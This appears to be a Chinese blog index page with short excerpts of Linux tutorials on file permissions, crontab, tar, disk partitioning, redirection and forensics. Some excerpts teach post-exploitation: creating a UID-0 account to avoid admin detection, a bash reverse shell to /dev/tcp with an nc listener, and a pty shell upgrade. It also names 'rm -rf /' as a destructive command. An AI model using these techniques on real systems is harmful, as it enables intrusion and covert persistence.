qq_29566629的博客

wc命令

nginx目录

http://blog.chinaunix.net/uid-20809581-id-3141879.html

前言在成功拿下一个服务器并提权成为root用户以后，为了减少root用户使用时间从而减少被网站管理员发现的概率，就需要新建一个普通用户，并赋予其完全的管理员权限，有以下三种常见的方式三种方式1. 直接修改/etc/passwd文件/etc/passwd文件里的第三列是UID，这个值为0的话就表示这个用户具有完全的管理员权限，所以新建一个用户后只需要把这个值置为0就可以：如图的ning这个账户，只是更改了UID，现在验证一下是否具有了root权限：可以看到，能打开/etc/shadow这个文件

为什么需要sudo？在linux中，如果你是普通用户，想要执行管理员才有权限的命令，那么大概有以下三种途径：通过su - root 命令切换为root用户，这时必须知道root的密码（可能造成root用户的泄露）把自己加入到root 组中通过配置/etc/sudoers把自己加入到sudo中如何配置/etc/sudoers？如图，显然root用户可以使用sudo命令，-u参数指定用户。而当使用test1账户执行sudo时：显示不是sudoers file当然也没有创建用户的权利：

ID 范围说明：0 ：系统管理员：当 UID 是 0 时，代表这个账号是『系统管理员』！ 所以当你要让其他的账号名称也具有 root 的权限时，将该账号的 UID 改为 0 即可。 这也就是说，一部系统上面的系统管理员不见得只有 root 喔！ 不过，很不建议有多个账号的 UID 是 0。1-499：系统账号：保留给系统使用的 ID，其实除了 0 之外，其他的 UID 权限与特性并没有不一样。默认 500 以下的数字让给系统作为保留账号只是一个习惯，由于系统上面启动的服务希望使用较小的权限去运行，因此不

使用一条命令即可：python -c ‘import pty;pty.spawn(“/bin/bash”)’'''-c 后跟命令，也就是说后面引号里的内容相当于会执行的代码pty 模块定义了一些处理“伪终端”概念的操作：启动另一个进程并能以程序方式在其控制终端中进行读写。pty.spawn(argv[, master_read[, stdin_read]])生成一个进程，并将其控制终端连接到当前进程的标准 io。 这常被用来应对坚持要从控制终端读取数据的程序。'''所以在靶机里存在Pyth

这里有一点需要注意，就是命令1的正确输出，错误输出不会被作为命令B的输入

需要注意的知识点：linux提供了垃圾桶机制： 有时候我们需要将信息统统丢掉，不显示到屏幕，也不记录到如何文件，有什么办法呢？当然有，在我们的linux中，有一个设备 /dev/null ，也就是空设备的意思，它就像一个黑洞，任何东西进入它都会消失。所有我们只需要将数据流重定向指这个设备就行了。上图表示把错误输出到垃圾桶里。&>可以将错误信息或者普通信息都重定向输出...

可以看到，+x表示增加执行权限

要解压的话：

针对gcc,新建一个c语言文件：3. 常用的有两个命令：-o 将main.c预处理、编译、汇编并链接形成可执行文件main。-o选项用来指定输出文件的文件名。-S 把.c文件编译成汇编文件.s查看汇编文件：其他还有把.s文件输出为.o文件的命令-c把.o文件链接为可执行文件的命令也是-o...

linux中>表示覆盖原文件内容（文件的日期也会自动更新），>>表示追加内容（会另起一行，文件的日期也会自动更新）。

tail（尾巴的意思），用来查看文件最后几行的数据，默认是10行tail -f filename 会把 filename 文件里的最尾部的内容显示在屏幕上，并且不断刷新，只要 filename 更新就可以看到最新的文件内容。

作用：用来设置定时任务查看服务状态：crontab -e 编辑定时命令：这条命令的意思是每分钟往3.txt这个文件里追加一个“fuck”crontab -l 查看所有定时命令：crontab -r 清除所有定时命令（立即生效）命令格式：...

cp /etc/passwd . 对于目录，如果想要对其中的内容进行操作，都要加上-rmv可以被用来进行重命名

linux中主要使用grep和egrep来查找字符串

autopay是kali自带的磁盘/分区取证工具打开：在浏览器里进去界面：新建case后，随便填一些信息，然后打开image:后面就可以对这个img进行分析了：

先创建一个分区，具体步骤参考这个链接然后挂载：提示错误的话，试试 mount -t ext4 /dev/sdb4 /mnt/sdb4/

在linux中“一切皆文件”，所以任何硬件设备也是文件，他们也有自己的一套文件系统所以当想在linux中使用硬件设备时，只有将linux本身的文件目录和硬件设备的文件目录合二为一，赢家设备才能为我们所用，而这个“合二为一”的过程就是“挂载”。挂载，指的就是将设备文件中的顶级目录连接到linux根目录下的某一目录（最好是根目录），这时访问此目录就相当于访问设备文件。...

打包和压缩的基本概念：很多人认为打包和压缩是一回事，其实不然，打包和压缩是有明显区别的。打包只是单纯把多个档案集合成一个档案，从文件所占容量上来说，打包后的档案比原来 多个档案的容量之和还会有所增加；就好比你把一堆东西放到一个袋子里面，由于袋子本身有重量，那么总的总量是不是比原来的多了呢？那么压缩呢，压缩是将档案中多余的东西丢掉，这样就能减少所占容量，我们知道，在计算机中，文件都是以二进制来记录的，我们使用的计算机都是使用 bytes作为计量单位，但事实上，计算机最小的计量单位是bits，1bytes.

先使用fdisk -l 查看磁盘分区情况：使用 fdisk /dev/vdb来对/dev/vdb这个磁盘进行操作：使用m查看帮助：输入“n”，表示增加一个分区：这里可以看到“e”表示扩展分区，p表示主分区选择“p”，增加一个主分区：大小为2G，然后使用“p”查看：接着增加一个扩展分区：在扩展分区里增加逻辑分区：使用“w”命令完成更改并退出以后，使用fdisk -l来查看现在的磁盘情况：可以看到分区已经完成...

df（disk free）命令用于显示目前在 Linux 系统上的文件系统磁盘使用情况统计。Linux du （英文全拼：disk usage）命令用于显示目录或文件的大小。加上-h以可读性更强的方式显示文件大小由此可见，一个是对于整体磁盘使用情况的显示，一个是对现在目录下文件情况的显示...

硬盘的第一个扇区（0道0头1扇区）被保留为主引导扇区。在主引导区内主要有两项内容：主引导记录和硬盘分区表。主引导记录是一段程序代码，其作用主要是对硬盘上安装的操作系统进行引导；硬盘分区表则存储了硬盘的分区信息。计算机启动时将读取该扇区的数据，并对其合法性进行判断（扇区最后两个字节是否为0x55AA或0xAA55 ），如合法则跳转执行该扇区的第一条指令。所以硬盘的主引导区常常成为病毒攻击的对象，从而被篡改甚至被破坏。这里的分区表一共64个字节，每个分区占16个字节，所以理论上一共能分4分分区，但是如果想分更

磁盘系统示意图查看磁盘情况命令： fdisk -l /dev/sda查看磁盘已使用情况命令： df（disk free）：查看inode使用情况：df -i /dev/sda1查看一个文件的状态： stat 1.txt：这是新建的一个文件，所以size是0写入一些数据以后：...

rpm(redhat package manager) 是用来管理软件包的工具netstat -tunlp 可以查看应用和使用的端口(一般情况就使用这个，显示信息较全)安全增强型 Linux（Security-Enhanced Linux）简称 SELinux，它是一个 Linux 内核模块，也是 Linux 的一个安全子系统。SELinux 主要由美国国家安全局开发。2.6 及以上版本的 Linux 内核都已经集成了 SELinux 模块。关闭方式：setenforce 0添加多个IP地址：.

关闭不必要的服务查看当前进程的命令： ps -ef 或者 ps -aux（最好使用ps-ef）这里可以看到PID，想杀死一个进程使用 kill PID 命令增加或者减少特殊文件的权限查看权限的命令是 ll 如图：查看passwd文件的权限：如果是个网络服务器，不想让用户对用户系统进行修改，可以使用如下命令：禁用不使用的账户在passwd文件里的用户一行前加注释：这样这个账户名就无法使用了,当登录时，会显示：去掉注释以后会恢复正常。ps：linux su..

使用root用户 useradd liu 然后修改密码 passwd liu 注意这里设置密码的时候对于密码的强度有提示，所以要设置比较强的密码。进入普通用户 su liu主要学习finger命令（指纹的意思）可以看到用户的一些基本信息。还可以使用 chfn修改finger信息修改用户的shell类型：通过id命令不仅可以看到自己账户的信息，还可以看到其他账户的信息：还可以据此判断账户是否存在。...

第一步，先使用TrID工具识别出两个文件的类型：其中，ELF文件是Linux下的主要可执行文件。更加精确地分析可以使用linux下的file命令，看到是coredump文件：至于什么是coredump，可以看这里改后缀打开pcap文件，通过Ctrl+F找到server hello包里的session_id：其中客户端（浏览器端）通过一个名为ssl_session_st的结构体存储SSL相关的密钥参数，其中ssl_session_st的部分数据结构表示如下：使用C32Asm打开f..

linux中，有的进程在关闭终端后就会自动终止，所以需要一种能够在关闭终端后依然能够运行的机制，nohup就是这样一种机制（no hang up）具体执行为： nohup Command [ Arg … ] [　& ]比如我想要我的gophish运行在后台，那么执行 nohup ./gophish & 就可以执行之后会在当前目录生成一个nohup.out文件，用来记录日志，如果当前目录不可写，就会在 $HOME/nohup.out 生成这样生成的进行就会一种运行查看这个进程的命.

隐藏文件以点号“.”开始，查看的话可以用:ls -a ls是list（列出）的意思，a是all的意思，因此这条命令就是列出所有文件的意思。l. 这条命令就是列出所有隐藏文件的意思。

先确定要配置地址的网卡名称：使用vi配置如下文件： vi /etc/sysconfig/network-scripts/ifcfg-ens33重启网络： systemctl restart network注意点： 如果是在VMware 虚拟机里配置，需要先把网络网络适配器改成桥接模式。...

最常用也是最好用的就是如下命令：bash -i > /dev/tcp/192.168.31.4/8080 0>&1 2>&1 2>&1 将标准错误重定向到标准输出中。上述是在被控者的机器上。需要在攻击者的机器上监听端口，一般使用如下命令：nc -lpv 8080 #8080表示你监听的端口...

1. 作用在Linux系统的实际使用中，可能会经常碰到让系统在某个特定时间执行某些任务的情况，比如定时采集服务器的状态信息、负载状况；定时执行某些任务/脚本来对远端进行数据采集等，这时就要使用到crontab这个命令。2. 使用方式网络上有很多博客在介绍crontab时，刚开始就会列出很多文件以及其作用，阅读起来很困难，所以我准备先给出其使用方式，再介绍相关文件。创建、修改定时任务（1）通过crontab -e这里实际编辑的文件是 /var/spool/cron/root 注意这里的ro

root 给自己修改： passwd[root@valder-cent ~]# passwdChanging password for user root.New password:给其他用户修改：[root@valder-cent valder]# passwd valderChanging password for user valder.New password:

“~”在linux的目录系统中，有几个表示特殊目录的字符，“~”表示的是当前用户的根目录，也就是/home/uesr_name，如下：回到了自己用户的根目录。“/”“/”表示的是linux系统的根目录，如下图：所以rm -rf / 和rm -rf /* 这两条命令是大杀招，因为直接就把linux的根目录给强制删除了。...

1. 压缩命令格式： tar -cvf 压缩后的文件名 压缩前的路径/文件名例如： tar -cvf name.tar 1.pdf这条命令就是把1.pdf这个文件压缩到name.tar这个压缩包里。2. 解压命令格式： tar -xvf 压缩文件名例如： tar -xvf name.tar...

1.Ubuntu安装过程的兼容问题我用的是Ubuntu18.04，在安装完成以后进系统的时候卡在logo页面，根据网上教程在启动时的Grup页面里选择“Ubuntu”，按“e”键，在出来的配置文件中 找到 “quiet splash”，在后面加上了“acpi=off”，按照我的理解，加这一参数的目的是禁用独显，因为独显在没有驱动的时候和Ubuntu不兼容，所以要先禁用，这样才能顺利进入系统，进入...

在文件夹内Ctrl+h,就可以看到以.开头的隐藏文件